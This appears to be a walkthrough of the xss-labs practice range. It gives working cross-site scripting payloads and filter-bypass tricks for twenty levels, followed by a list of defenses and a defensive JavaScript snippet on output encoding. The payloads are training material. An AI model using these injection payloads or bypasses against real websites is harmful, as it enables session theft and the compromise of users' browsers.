Article directory
- Preface
- 1. Level 1
- 2. Level 2
- 3. Level 3
- 4. Level 4
- 5. Level 5
- 6. Level 6
- 7. Level 7
- 8. Level 8
- 9. Level 9
- 10. Level 10
- 11. Level 11
- 12. Level 12
- 13. Level 13
- 14. Level 14
- 15. Level 15
- 16. Level 16
- 17. Level 17
- 18. Level 18
- 19. Level 19
- 20. Level 20
- XSS defense methods
Preface
xss-labs is another practice range that is well suited to beginners. This post walks through every level, then covers defense methods against XSS vulnerabilities and a useful XSS tool.
Online range: http://test.ctf8.com
XSS automation tool: XSStrike
Project address: https://github.com/s0md3v/XSStrike
1. Level 1
There is no filtering at all; enter the XSS payload directly.
<script>alert('test')</script>
2. Level 2
The input lands inside a tag attribute, so close the tag first and then inject.
"><script>alert('test')</script>
3. Level 3
The < and > characters are HTML entity-encoded, so a new tag cannot be opened.
Stay inside the existing tag instead: close the single-quoted attribute value and add an event-handler attribute. Since HTML separates attributes with a space, the payload begins and ends with one.
' onclick=alert('test') '
4. Level 4
Almost the same as Level 3, except that the attribute value is closed with double quotes.
" onclick=alert('test') "
5. Level 5
Hint: JavaScript pseudo-protocol.
Bypass by constructing an href attribute.
"><a href="javascript:alert('test')">点击</a><"
6. Level 6
href is filtered as well, so try a case-variation bypass.
" Onclick=alert('test') "
7. Level 7
Double-write bypass: the filter removes the keyword only once, so the surviving characters form it again.
" OOnnclick=alert('test') "
8. Level 8
HTML entity encoding bypass: encode part of the keyword as HTML entities so the keyword filter does not match it, while the browser still decodes it when following the href.
javascript:alert('test')
After encoding (the entity-encoded form is shown here in its decoded form):
javascript:alert('test')
9. Level 9
This level is rather unreasonable.
Hint: a check for the presence of a keyword.
The string http:// must be present, otherwise an error is reported that the link is illegal (HTML encoding is applied). Put it inside a comment in the payload:
javascript:alert('test')/* http:// */
10. Level 10
Hint: hidden information.
By constructing parameters and checking the response, we find that only the value of t_sort changes, so this hidden tag is the way in.
Try injecting the pop-up payload through the t_sort parameter:
<script>alert('xss')</script>&t_sort=" type="text" onclick="alert('xss')
11. Level 11
Hint: Referer information.
After capturing the request, you can see that the Referer header is missing.
Add the following to the Referer header:
referer: "type="test" onclick="alert('test')
12. Level 12
The injection point is the User-Agent header.
user-agent: "type="text" onclick="alert('test')
13. Level 13
The injection point is the cookie: capture the request with Burp Suite (bp) and write the payload into the cookie.
"type="text" onclick="alert('test')
14. Level 14
Level 14 is not demonstrated because the website it relies on is no longer accessible.
15. Level 15
Seeing src in this level, you can guess that it is a file-inclusion challenge.
Include the previous level and pass parameters to it to trigger the pop-up:
?src='/level1.php?name=<img src=1 onmouseover=alert()>'
Due to environmental reasons there are no screenshots; for the next few levels I only include the payload.
16. Level 16
Many tags and common methods are filtered here.
Use a newline (Enter, %0A) instead of spaces to bypass detection:
?keyword=<svg%0Aonload=alert(1)>
17. Level 17
There is a problem with the environment, so I skipped it.
?arg02= onclick=alert()
18. Level 18
Payload borrowed from other experts' writeups:
?arg02= onmousedown=alert()
19. Level 19
?arg01=version&arg02=<a href="javascript:alert()">here</a>
20. Level 20
?arg01=id&arg02=xss\"))}catch(e){alert(1)}//%26width=123%26height=123
XSS defense methods
1. The XSS filter function must filter characters such as <, >, <script> and </script>.
2. The XSS filter function must filter keywords such as javascript.
3. The XSS filter function must filter characters such as &, # and \.
4. The XSS filter function must filter the style tag, the style attribute, and keywords such as expression, javascript and import.
5. Avoid methods that execute strings, such as eval and new Function, unless the string is confirmed to be unrelated to user input.
6. Use the HttpOnly attribute on cookies; a cookie field carrying this attribute cannot be read or written by JavaScript.
7. HTML entity encoding.
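As an added example (not code from xss-labs or from this writeup), the Node.js snippet below contrasts a naive keyword-stripping filter, which the double-write trick of Level 7 defeats, with entity encoding of output (item 7) and an HttpOnly session cookie (item 6), using the page's own Level 1, 2 and 7 payloads as test inputs. naiveStripFilter, renderSearchPage and the page template are assumptions modelled on the lab's structure, not its code.

```javascript
// Added example, not part of xss-labs: blacklist filtering vs. output
// entity encoding, exercised with the payloads from this walkthrough.

// Naive blacklist in the spirit of the filters the levels above bypass:
// strips ONE occurrence of "on" and "script". Double-writing ("OOnnclick")
// leaves a working handler behind after the strip.
function naiveStripFilter(input) {
  return String(input).replace(/on/i, '').replace(/script/i, '');
}

// Output encoding: every character that can change HTML structure becomes
// an entity, so the browser never sees a new tag, attribute or quote.
// Safe for text nodes and for quoted attribute values (Levels 1-4 contexts).
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function encodeForHtml(input) {
  return String(input).replace(/[&<>"'\/]/g, (ch) => HTML_ENTITIES[ch]);
}

// Hypothetical template (assumption): user input lands in a text node and
// in a double-quoted attribute, the two contexts the early levels exploit.
function renderSearchPage(keyword) {
  const safe = encodeForHtml(keyword);
  return `<h2>No results for ${safe}</h2>\n` +
         `<input name="keyword" value="${safe}">`;
}

// Structural check: with correct encoding the number of '<' in the output
// equals the number of tags in the template (3), whatever the input was.
function countTagOpeners(html) {
  return (html.match(/</g) || []).length;
}

// Session cookie with HttpOnly (item 6): even if an injection does land,
// page scripts cannot read the cookie value.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Stand-alone demonstration with constructed inputs taken from the levels.
const PAYLOAD_LEVEL1 = "<script>alert('test')</script>";
const PAYLOAD_LEVEL7 = "\" OOnnclick=alert('test') \"";
console.log(naiveStripFilter(PAYLOAD_LEVEL7));   // handler survives the strip
console.log(renderSearchPage(PAYLOAD_LEVEL1));   // payload rendered as inert text
console.log(countTagOpeners(renderSearchPage(PAYLOAD_LEVEL1))); // 3
console.log(sessionCookieHeader('session', 'constructed-session-id'));
```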